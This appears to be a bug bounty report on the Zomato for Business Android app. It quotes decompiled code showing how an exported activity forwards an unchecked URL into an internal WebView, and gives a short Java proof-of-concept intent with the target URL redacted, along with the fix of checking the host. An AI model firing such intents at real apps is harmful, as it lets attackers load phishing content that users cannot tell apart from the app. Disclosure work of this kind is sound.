[Zomato for Business Android] Vulnerability in exported activity WebView

Hello, i want to report the vulnerability found, Since the following activity `com.application.zomatomerchant.home.HomeSalt` has `exported="true"` it can be exploited by another application. ###Application Information Application: [Zomato for Business](https://play.google.com/store/apps/details?id=com.application.zomatomerchant) Package Name: `com.application.zomatomerchant` Version: `4.2.5` Version Status: Last Vulnerable class: `com.application.zomatomerchant.deeplink.SaltDeepLinkRouterActivity` ###Vulnerability Using a special intent, you can send a malicious url to class `com.application.zomatomerchant.ZWebView` ```java public class HomeSalt extends PhiAppCompatActivityWithSimpleToolbar implements C0806a, C0928a { protected void onCreate(Bundle bundle) { super.onCreate(bundle); if (this.f2062r == null) { this.f2062r = C0940a.m2184a(this); } mo7458b(R.layout.home_salt); mo7475d(R.string.app_name); this.f2061q = (Toolbar) findViewById(R.id.toolbar_simple_root); this.f2059o = (DrawerLayout) findViewById(R.id.drawer_layout); if (getIntent() != null) { Uri data = getIntent().getData(); if (data != null && m2113a(data.toString())) { Bundle extras = getIntent().getExtras(); if (extras == null || !extras.getBoolean("notification_popup", false)) { mo10440c(data);//put data //... public void mo10440c(Uri uri) { if (!C0807b.f1729a.equals(uri)) { if (mo10218b(uri)) { mo10217a(uri); } else { SaltDeepLinkRouterActivity.m1755a((Context) this, uri);//put data //... public static void m1755a(Context context, Uri uri) { Intent intent = new Intent(context, SaltDeepLinkRouterActivity.class); intent.setFlags(268435456); intent.setData(uri); context.startActivity(intent); } //... protected void onCreate(Bundle bundle) { super.onCreate(bundle); Intent intent = getIntent(); if (!(intent == null || intent.getData() == null)) { Uri data = intent.getData(); if (mo10218b(data)) { mo10217a(data);//put data //.. public void mo10217a(Uri uri) { if (uri != null) { Intent intent; C0810e a = C0810e.m1769a((Activity) this); String host = uri.getHost(); List pathSegments = uri.getPathSegments(); int size = pathSegments != null ? pathSegments.size() : 0; } else if (!C2150af.m6783a(uri.getScheme()) && uri.getScheme().startsWith("http")) { intent = new Intent(this, ZWebView.class);//load url intent.putExtra("open_external", true); intent.putExtra(NativeProtocol.IMAGE_URL_KEY, uri.toString());//put data ``` Host check missing. F468292 ###PoC Java PoC: ```java Intent intent = new Intent("android.intent.action.VIEW"); intent.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION|Intent.FLAG_ACTIVITY_NEW_TASK); intent.setClassName("com.application.zomatomerchant","com.application.zomatomerchant.home.HomeSalt"); intent.setData(Uri.parse("███████/")); startActivity(intent); ``` Payload: ██████ ###Fix Check the host before load to WebView ## Impact XSS/Ability of open arbitrary sites in your internal WebView Allows you to replace the content in the application on malicious website. The user will not be able to understand the difference. The vulnerability is included in the [Google Play Security Reward Program](https://hackerone.com/googleplay) (section 2 Theft of insecure private date)